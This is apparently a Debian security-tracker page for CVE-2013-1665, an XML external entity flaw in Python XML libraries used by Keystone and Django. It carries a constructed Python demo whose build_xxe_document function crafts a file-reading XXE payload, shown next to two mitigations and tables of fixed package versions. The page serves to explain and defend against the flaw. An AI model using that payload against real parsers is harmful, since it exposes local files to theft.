CVE-2013-1665

Name: CVE-2013-1665
Description: The XML libraries for Python 3.4, 3.3, 3.2, 3.1, 2.7, and 2.6, as used in OpenStack Keystone Essex and Folsom, Django, and possibly other products, allow remote attackers to read arbitrary files via an XML external entity declaration in conjunction with an entity reference, aka an XML External Entity (XXE) attack.
Source: CVE (at NVD; cross-reference links: CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub code/issues)
References: DSA-2634-1
NVD severity: medium (attack range: remote)
Debian Bugs: 700948
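The description above names the mechanism but not the code path. The following is an added example, written for this page and not code from Debian, Django, Keystone or CPython, showing the attack against the standard-library xml.sax reader (the same reader xml.dom.pulldom uses) and two ways of closing it. It assumes a secret planted in a temporary file stands in for the arbitrary file an attacker would target, and it turns the xml.sax feature_external_ges feature on explicitly because CPython 3.7.1 and later ship it off by default; the affected Python releases listed above resolved external general entities without being asked. The helper names (build_xxe_document, parse_with_sax, parse_rejecting_entities, EntitiesForbidden, demo) are this example's own.

```python
"""CVE-2013-1665 style XXE through xml.sax, with two mitigations.

Constructed example, not the Debian, Django, Keystone or CPython code.
"""
import io
import os
import tempfile
import xml.sax
import xml.sax.handler
from pathlib import Path
from xml.parsers import expat


class TextCollector(xml.sax.handler.ContentHandler):
    """Collects the character data of every element into one string."""

    def __init__(self):
        super().__init__()
        self.chunks = []

    def characters(self, content):
        self.chunks.append(content)


def build_xxe_document(target_path):
    """Attacker-controlled XML: declare an external entity whose SYSTEM
    identifier points at a local file, then reference it in content."""
    uri = Path(target_path).resolve().as_uri()  # e.g. file:///tmp/xyz.txt
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [<!ENTITY xxe SYSTEM "{uri}">]>\n'
        "<data>&xxe;</data>\n"
    ).encode()


def parse_with_sax(document, resolve_external_entities):
    """Parse with xml.sax. True reproduces the behaviour the CVE relied on
    (the old default); False is the setting CPython 3.7.1+ defaults to."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges,
                      resolve_external_entities)
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(document))
    return "".join(collector.chunks)


class EntitiesForbidden(ValueError):
    """Raised when a document carries any entity declaration (example's own)."""


def parse_rejecting_entities(document):
    """Stricter option, in the spirit of the Django 1.4.4 fix: abort on any
    entity declaration so nothing (internal, external or parameter entity)
    is ever expanded. Drives expat directly."""
    def forbid(*_args):
        raise EntitiesForbidden("entity declarations are not allowed")

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = forbid  # fires while the internal subset is read
    parser.Parse(document, True)
    return True


def demo():
    """Plant a constructed secret in a temp file and return the three outcomes:
    (text leaked by the vulnerable parse, text from the hardened parse,
    whether the entity-rejecting parse aborted)."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("secret-token=CONSTRUCTED-SAMPLE-VALUE")  # constructed, not real
        target = fh.name
    try:
        doc = build_xxe_document(target)
        leaked = parse_with_sax(doc, resolve_external_entities=True)
        blocked = parse_with_sax(doc, resolve_external_entities=False)
        try:
            parse_rejecting_entities(doc)
            rejected = False
        except EntitiesForbidden:
            rejected = True
        return leaked, blocked, rejected
    finally:
        os.unlink(target)


if __name__ == "__main__":
    leaked, blocked, rejected = demo()
    print("vulnerable parse leaked:", repr(leaked))
    print("hardened parse returned:", repr(blocked))
    print("entity-rejecting parse aborted:", rejected)
```

With external general entities enabled the file contents come back as the element text; with the feature off the reference is silently skipped and the element is empty. Disabling the feature is what CPython itself later did by default, while the Django 1.4.4 release took the stricter route of rejecting documents that declare a DTD or entities at all, which also shuts off entity-expansion denial of service that a feature flag alone does not address.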

Vulnerable and fixed packages

The table below lists information on source packages.

Source Package        Release                    Version             Status
keystone (PTS)        jessie                     2014.1.3-6          fixed
keystone              stretch                    2:10.0.0-9          fixed
keystone              stretch (security)         2:10.0.0-9+deb9u1   fixed
keystone              buster, sid                2:13.0.0-7          fixed
python-django (PTS)   jessie (security), jessie  1.7.11-1+deb8u3     fixed
python-django         stretch                    1:1.10.7-2+deb9u1   fixed
python-django         stretch (security)         1:1.10.7-2+deb9u2   fixed
python-django         buster, sid                1:1.11.15-1         fixed

The information below is based on the following data on fixed versions.

Package        Type    Release     Fixed Version      Urgency  Origin      Debian Bugs
keystone       source  (unstable)  2012.1.1-13        medium   -           700948
python-django  source  (unstable)  1.4.4-1            medium   -           -
python-django  source  squeeze     1.2.3-3+squeeze5   medium   DSA-2634-1  -
